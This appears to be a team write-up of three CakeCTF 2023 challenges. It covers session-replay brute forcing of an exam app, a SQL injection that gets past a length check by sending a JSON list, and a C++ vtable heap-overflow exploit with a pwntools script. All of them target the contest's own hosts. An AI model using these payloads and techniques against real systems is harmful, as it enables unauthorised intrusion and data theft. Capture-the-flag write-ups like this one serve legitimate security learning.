Team: WAN
Rank: 142/729

TOWFL

Solver : Whale120

An exam web application which would generate some strange sentences with unknow characters every time and you have to get flag by getting a full mark on it.
There are a hundred strange problems, after a try on this application with Burp Suite, I found out two key points:

  • The submition would be post to path /api/submit and the submission result can be get by path:/api/score. The statements would be the same every time if the sessions are the same.
  • It would return your score every time.
    So my solution is to enumerate the answer of a problem every time by sending packages with the same session and check whether it’s right by the increase/decrease of score.
    about 400 tries, I finally get flag!!!
    Finall packages:
  • Submit 
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    POST /api/submit HTTP/1.1
    Host: towfl.2023.cakectf.com:8888
    Content-Length: 221
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.105 Safari/537.36
    Content-Type: application/json
    Accept: */*
    Origin: http://towfl.2023.cakectf.com:8888
    Referer: http://towfl.2023.cakectf.com:8888/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
    Cookie: session=.eJwFwQkNgDAMAEAvVdB3HbjptwQNBO_cvTBPww2G0TaaNUzJxcgdjbKuLVa4InJ8nDJaSQ-SrLbaV7q6Sh2E7wcTBRSv.ZU8oLA.Eg6KzOfgQ2jRkpXYuYEZaJp-mXw
    Connection: close

    [[1,0,3,1,1,3,3,0,1,0],[0,3,3,0,1,3,0,0,0,1],[2,1,3,3,0,3,3,2,2,1],[1,2,2,0,2,0,2,2,2,2],[2,3,2,2,0,3,3,1,2,3],[2,0,0,3,2,1,0,0,0,0],[3,1,0,1,0,0,1,2,2,2],[0,2,3,2,3,3,0,0,0,2],[2,2,2,0,0,0,2,0,2,1],[3,1,2,2,0,1,1,2,3,1]]
  • Get score 
    1
    2
    3
    4
    5
    6
    7
    8
    9
    GET /api/score HTTP/1.1
    Host: towfl.2023.cakectf.com:8888
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.105 Safari/537.36
    Accept: */*
    Referer: http://towfl.2023.cakectf.com:8888/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
    Cookie: session=.eJwFwQkNgDAMAEAvVdB3HbjptwQNBO_cvTBPww2G0TaaNUzJxcgdjbKuLVa4InJ8nDJaSQ-SrLbaV7q6Sh2E7wcTBRSv.ZU8oLA.Eg6KzOfgQ2jRkpXYuYEZaJp-mXw
    Connection: close
    Finall Result:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    HTTP/1.1 200 OK
    Server: nginx/1.21.6
    Date: Sat, 11 Nov 2023 07:37:40 GMT
    Content-Type: application/json
    Content-Length: 112
    Connection: close
    Vary: Cookie
    Set-Cookie: session=; Expires=Thu, 01 Jan 1970 00:00:00 GMT; Max-Age=0; HttpOnly; Path=/

    {"data":{"flag":"\"CakeCTF{b3_c4ut10us_1f_s3ss10n_1s_cl13nt_s1d3_0r_s3rv3r_s1d3}\"","score":100},"status":"ok"}
    My arms were almost broken by brute forcing through this…

Country DB

Solver:Whale120
An simple web application use to search country ID by input two charaters every time.
Its backend is setup by sqlite3 and python flask, and it would filter user input by this: 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
def api_search():
    req = flask.request.get_json()
    if 'code' not in req:
        flask.abort(400, "Empty country code")

    code = req['code']
    if len(code) != 2 or "'" in code:
        flask.abort(400, "Invalid country code")

    name = db_search(code)
    if name is None:
        flask.abort(404, "No such country")

    return {'name': name}

Search query: 

1
2
3
4
5
6
def db_search(code):
    with sqlite3.connect('database.db') as conn:
        cur = conn.cursor()
        cur.execute(f"SELECT name FROM country WHERE code=UPPER('{code}')")
        found = cur.fetchone()
    return None if found is None else found[0]

And I was stucked at here because I was thicking about SQL Injection with two characters
After about 30 minutes, I tried to send packages like this while I was testing sqlite and list container on python: 

1
2
3
4
5
6
7
8
9
10
11
12
13
POST /api/search HTTP/1.1
Host: countrydb.2023.cakectf.com:8020
Content-Length: 13
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.123 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://countrydb.2023.cakectf.com:8020
Referer: http://countrydb.2023.cakectf.com:8020/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"code":["a", "b"]}

And there was a 500 error code but not 400, which means that this can passed the length filter!!!
So I constructed my payload into this: 

1
2
3
4
5
6
7
8
9
10
11
12
13
POST /api/search HTTP/1.1
Host: countrydb.2023.cakectf.com:8020
Content-Length: 59
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.123 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://countrydb.2023.cakectf.com:8020
Referer: http://countrydb.2023.cakectf.com:8020/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"code":["CA') UNION SELECT FLAG FROM FLAG --","Rahlin<3"]}

Because python would consider the json of parameter code a list with legth 2, although sqlite can’t accept a list like object, but it can be a string if I add a annotation -- in the middle of my payload. Base on these, this UNION SQL Injection payload is effective!
Finall Request: 

1
2
3
4
5
6
7
8
HTTP/1.1 200 OK
Server: nginx/1.21.6
Date: Sun, 12 Nov 2023 06:57:06 GMT
Content-Type: application/json
Content-Length: 55
Connection: close

{"name":"CakeCTF{b3_c4refUl_wh3n_y0U_u5e_JS0N_1nPut}"}

vtable4b

Solver : 堇姬Naup

First,I try to nc it.You can look like that.If you can call the function win,you will get flag. 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
naup96321@DESKTOP-T2ED0OK:/mnt/c/Windows/system32$ nc vtable4b.2023.cakectf.com 9000
Today, let's learn how to exploit C++ vtable!
You're going to abuse the following C++ class:

  class Cowsay {
  public:
    Cowsay(char *message) : message_(message) {}
    char*& message() { return message_; }
    virtual void dialogue();

  private:
    char *message_;
  };

An instance of this class is allocated in the heap:

  Cowsay *cowsay = new Cowsay(new char[0x18]());

You can
 1. Call `dialogue` method:
  cowsay->dialogue();

 2. Set `message`:
  std::cin >> cowsay->message();

Last but not least, here is the address of `win` function which you should call to get the flag:
  <win> = 0x55a3e818c61a

1. Use cowsay
2. Change message
3. Display heap
>

  • If you enter the number 1.It is a cow which can say something.

    image
    image

  • If you enter the number 2.You can enter somthing words and sentence, and then it can change the text which spoken by the cow and heap data in third position

    image
    image

  • If you enter the number 3.Yoy can look a vtable. It is a structure in C++.

    image
    image

I think it can use overflow the heap to solve it.
In each round, it has differnce addresses. So first of all, the address of function win and the address of heap must be re-received in each round.
Next, we need to change its pointer so that it can control the heap first, and then call the function of win by entering 1.

Take this picture as an example.If use payload 

1
(b'A'*8)+p64(int(addr,16))+(b"A"*8)*2+p64(int(t_address,16))

and then you enter 1,it will call:

0x5634714d2ed0->0x5634714d2eb8->function win

image
image

Solve Script 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
from pwn import * 


r=remote("vtable4b.2023.cakectf.com",9000)


uns_addr = r.recvuntil(b"\n\n1.")
addr = uns_addr.split(b"\n\n1")[0][-14:]
print(addr)
r.recv()


r.send(b"3\n")
heap_data = r.recvuntil(b"\n\n1.")


print(heap_data)
t_address = heap_data.split(b"\n")[9][:14]
print(t_address)

r.recv(timeout=1)
r.send(b"2")

r.recvuntil(b": ",timeout=1)
r.send((b'A'*8)+p64(int(addr,16))+(b"A"*8)*2+p64(int(t_address,16)))

print("1111")

 
r.interactive()